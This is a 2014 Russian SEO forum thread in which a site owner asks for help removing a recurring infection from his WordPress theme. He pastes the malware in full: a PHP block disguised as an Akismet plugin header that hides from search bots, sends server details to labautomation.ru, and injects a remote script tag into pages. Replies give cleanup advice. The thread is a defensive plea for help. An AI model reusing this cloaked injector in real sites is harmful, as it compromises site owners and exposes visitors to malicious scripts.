Взламывают сайты Яндекс орет что на

Сообщение сайта

(Сообщение закроется через 3 секунды)

Здравствуйте, гость (

| Вход | Регистрация )

SEO форум MaulTalk.com > Поисковая оптимизация > Яндекс

Взламывают сайты Яндекс орет что на, сайте вирус

Опции

GuN

Topic Starter сообщение

29.11.2014, 9:43; Ответить: GuN

Сообщение #1

Участник

Группа: User
Сообщений: 120
Регистрация: 7.10.2010
Поблагодарили: 5 раз
Репутация:

Доброго всем дня. Уже менсяц борюсь с этой заразой!! Может кто сталкивался прошу помочь

незнаю что делать уже.

это вставка пстоянно всталяеться в котент вирус часть первая
--------------------------------------------------------------------
<script type="text/javascript" src="http://labautomation.ru/jbkw2ybt.php?id=4477416"></script>
---------------------------------------------------------------------

эта вставка которая вставляеться в idex.php тему сайта! Я что только не делал, выствлял прова доступа на фаилы 444 всеровно меняет и всталяет эту дрянь! Менял пароли везде. Не помогает. Может укого что то было подобное как это победить???? :facepalm:

эта вставка которая вставляеться в idex.php тему сайта, часть вторая!
---------------------------------------------------------------------
<?php
#395547#
/**

* @package Akismet

*/

/*

Plugin Name: Akismet

Plugin URI: http://akismet.com/

Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.

Version: 3.0.0

Author: Automattic

Author URI: http://automattic.com/wordpress-plugins/

License: GPLv2 or later

Text Domain: akismet

*/

/*

This program is free software; you can redistribute it and/or

modify it under the terms of the GNU General Public License

as published by the Free Software Foundation; either version 2

of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

GNU General Public License for more details.

You should have received a copy of the GNU General Public License

along with this program; if not, write to the Free Software

Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

*/

if( empty( $rr ) ) {

if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(

"/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",

$_SERVER['HTTP_USER_AGENT']

)

) {

} else {

error_reporting( 0 );

@ini_set( 'display_errors', 0 );

if( !function_exists( '__url_get_contents' ) ) {

function __url_get_contents( $remote_url, $timeout )

{

if( function_exists( 'curl_exec' ) ) {

$ch = curl_init();

curl_setopt( $ch, CURLOPT_URL, $remote_url );

curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );

curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );

curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds

$_url_get_contents_data = curl_exec( $ch );

curl_close( $ch );

} elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {

$ctx = @stream_context_create(

array(

'http' =>

array(

'timeout' => $timeout,

)

)

);

$_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );

} elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {

$handle = @fopen( $remote_url, "r" );

$_url_get_contents_data = @stream_get_contents( $handle );

} else {

$_url_get_contents_data = __file_get_url_contents( $remote_url );

}

return $_url_get_contents_data;

}

}

if( !function_exists( '__file_get_url_contents' ) ) {

function __file_get_url_contents( $remote_url )

{

if( preg_match(

'/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',

$remote_url,

$matches

)

) {

$protocol = strtolower( $matches[1] );

$host = $matches[2];

$path = $matches[3];

} else {

// Bad remote_url-format

return false;

}

if( $protocol == "http" ) {

$socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );

} else {

// Bad protocol

return false;

}

if( !$socket ) {

// Error creating socket

return false;

}

$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";

$len_written = @fwrite( $socket, $request );

if( $len_written === false || $len_written != strlen( $request ) ) {

// Error sending request

return false;

}

$response = "";

while( !@feof( $socket ) &&

( $buf = @fread( $socket, 4096 ) ) !== false ) {

$response .= $buf;

}

if( $buf === false ) {

// Error reading response

return false;

}

$end_of_header = strpos( $response, "\r\n\r\n" );

return substr( $response, $end_of_header + 4 );

}

}

$rr['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];

$rr['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];

$rr['HTTP_HOST'] = $_SERVER['HTTP_HOST'];

$rr['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];

$rr['SERVER_NAME'] = $_SERVER['SERVER_NAME'];

$rr['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];

$rr['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];

$rr = __url_get_contents("http://labautomation.ru/jbkw2ybt.php" . "?fid=318923&info=" . http_build_query( $rr ) . "&no=1", 1);

echo "<script type=\"text/javascript\" src=\"http://labautomation.ru/jbkw2ybt.php?id=4477447\"></script>";

}

}
#/395547#
?>
----------------------------------------------------------------------------

Сообщение отредактировал GuN - 29.11.2014, 9:46

--------------------

Разработка и дизайн сайтов на http://aktualweb.ru

Ответить с цитированием данного сообщения

FreeJabber FreeJabber 29.11.2014, 10:07; Сообщений: 1728 Поблагодарили: 676 раз Репутация: 129 Просмотр профиля	29.11.2014, 10:07; Ответить: FreeJabber Сообщение #2
Старожил Группа: Active User Сообщений: 1728 Регистрация: 9.5.2011 Из: Москва Поблагодарили: 676 раз Репутация: 129	Поле с кодом поместите в споллер, а то много места занимает. Была такая же проблема ( первая часть) Решил её путём нанятия специального человека. -------------------- Куплю Ваши знания ( которые приносят деньги ) Писать в личку

seomasters seomasters 29.11.2014, 10:38; Сообщений: 701 Поблагодарили: 246 раз Репутация: 62 Просмотр профиля	29.11.2014, 10:38; Ответить: seomasters Сообщение #3
клоновод Группа: Banned Сообщений: 701 Регистрация: 22.9.2011 Из: Россия, Крым Поблагодарили: 246 раз Репутация: 62	Готов помочь обращайтесь! -------------------- клоновод

kluben kluben 7.12.2014, 12:47; Сообщений: 120 Поблагодарили: 18 раз Репутация: 2 Просмотр профиля	7.12.2014, 12:47; Ответить: kluben Сообщение #4
Участник Группа: User Сообщений: 120 Регистрация: 23.8.2012 Поблагодарили: 18 раз Репутация: 2	Доступ по SSH закройте. Мне как-то помогло. Да и сайт на каком движке? есть смысл сменить хостера, заново установить обновленную (!) СМС и залить по новой базу. И доступ по SSH прикрыть. Заново установить СМС это означает установка с нуля из архива взятого на оф сайте. А не перенос файлов от одного хостера к другому. Тему то где для сайта брали? Скачали где-то? Сообщение отредактировал kluben - 7.12.2014, 12:47

Robust

7.12.2014, 14:17; Ответить: Robust

Сообщение #5

Участник

Группа: User
Сообщений: 189
Регистрация: 17.9.2014
Из: Местный
Поблагодарили: 44 раза
Репутация:

Похоже на WP. Сеопак не стоит случайно? Тема из паблика. Все это очень смахивает на шелл

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

« Предыдущая тема · Яндекс · Следующая тема »

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Настройка яндекс директ рекламы БЕЗ РАСХОДОВ БЮДЖЕТА Количество продаж будет ОГРАНИЧЕННО!	22	ITstaf	4271	Сегодня, 21:00 автор: 100ftd
Аналоги Яндекс Директ	4	kuz999	1820	Сегодня, 18:55 автор: xramoviy
Сайты уходят в прошлое для развития бизнеса стали не столь актуальны	156	muratastana	31141	Сегодня, 12:01 автор: Skyworker
Нужна програмка постинга в свои сайты	0	kasey7	263	Вчера, 19:54 автор: kasey7
Во что Вы играете?	400	Vmir	67942	20.4.2024, 18:39 автор: SaintExchange

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Подписка на тему · Сообщить другу · Версия для печати · Подписка на этот форум

Текстовая версия

Сейчас: 23.4.2024, 21:00

Дизайн